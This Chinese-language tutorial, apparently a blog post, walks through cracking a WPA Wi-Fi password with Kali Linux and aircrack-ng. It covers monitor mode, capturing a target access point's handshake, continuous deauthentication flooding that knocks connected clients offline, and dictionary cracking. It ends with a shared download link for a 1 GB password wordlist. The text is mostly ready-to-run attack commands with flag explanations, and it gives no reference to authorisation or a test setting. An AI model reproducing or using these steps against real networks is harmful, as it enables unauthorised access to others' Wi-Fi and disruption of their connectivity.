首先:你要有一个兼容kali linux的无线网卡用于嗅探网络
如我的是:RT3070(免驱)
注:kali linux系统不能使用物理主机上的网卡
1.显示或配置网络设备(网络接口卡)
ifconfig
注:网卡信息配置:/etc/network/interfaces
auto lo # auto表示开机启动该网卡设备
iface lo inet loopback
auto eth0 # 使用dhcp分配地址
iface eth0 inet dhcp iface
eth0 inet6 auto auto eth1 # 使用静态地址
iface eth1 inet static
address 192.168.1.2/24
gateway 192.168.1.1 (注:netstat -rn 查看网关地址)
注:虚拟机打开后,主机无法上网
给无线网卡设置静态地址时不要设置有可能与其他设备冲突的ip地址,冲突情况:在没虚拟机时,主机重新连接无线路由,路由使用dhcp分配地址给主机(恰好与虚拟机配置的网卡地址冲突),当打开虚拟机时,就会两机无法上网。
2.无线网络设备信息,查看无线网卡的状态的是否为监听状态
iwconfig
3.查看所有影响到aircrack-ng工作的进程
airmon-ng check
4.结束所有影响到aircrack-ng工作的进程
airmon-ng check kill
5.无线网卡wlan0进入监听状态
airmon-ng start wlan0
6.wifi嗅探
airodump-ng wlan0mon
6.wifi嗅探后会出现以下列表
(注:若不出嗅探信息,1.airmon-ng stop wlan0mon 2.airmon-ng start wlan0 3.service network-manager start)
BSSID: 接入点的MAC地址
PWR 网卡反馈的信号水平,它的数值是驱动决定的,PWR是-1,则表示驱动不支持信号水平
Beacons: 接入点发出的公告报文的数量,每个接入点每秒大概发送10个公告包(以最低的速率1M)
Data: 捕捉到的数据包的数量
/s: 过去10秒每秒接收到的数据包数量
CH: 无线信道(从beacon包中得到)
MB: 接入点支持的最大速度。
ENC: 表示使用的加密算法。
CIPHER: 检测出的密码体系,CCMP,WRAP,TKIP,WEP,WEP40和WEP104中的一种。
AUTH: 使用的认证协议。GMT(WPA/WPA2 使用单独的认证服务器),SKA(WEP共享密钥) ,PSK(WPA/WPA2 预共享密钥),或者OPN(WEP开放认证)
ESSID: 无线网络名称。
7.开始抓包
root@kali:~# airodump-ng -c 1 --bssid AA:BB:CC:DD:EE:FF -w /root/桌面/sonofbitch/ wlan0mon
-c :选择信道
-w :抓到的包存放的目录(注:pwd查看当前目录)
8.进行洪泛攻击,可以理解为你设备与wifi的信道被塞满
(注:多次洪泛攻击才可以找到相应的信道进行攻击)
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF -c GG:HH:II:JJ:KK:LL wlanOmon
Attack modes (numbers can still be used): //攻击模式(数字仍然可以使用)
--deauth count : deauthenticate 1 or all stations (-0) //解除一个或者全部站的连接
--fakeauth delay : fake authentication with AP (-1) //对AP进行伪连接攻击
--interactive : interactive frame selection (-2) //交互注入攻击
--arpreplay : standard ARP-request replay (-3) //标准Arp请求包重放攻击
--chopchop : decrypt/chopchop WEP packet (-4) //解码或断续WEP数据包攻击
--fragment : generates valid keystream (-5) //产生合法密钥流 -
【-0】:冲突攻击模式,后面跟发送次数(设置为 0,则为循环攻击,不停的断开连接,客户端无法正常上网)
【-a】:设置 ap 的 mac
【-c】:设置已连接的合法客户端的 mac。
如果不设置-c,则断开所有和 ap 连接的合法客户端。
9.跑包(注:跑包效率取决电脑性能,字典和运气)
aircrack-ng -w /root/桌面/wordlist.txt /root/桌面/sonofbitch/-01.cap
分享自家用1G字典:https://pan.baidu.com/s/1U0UWW7Qf64Z1XcaMsum-Bw 密码:nonp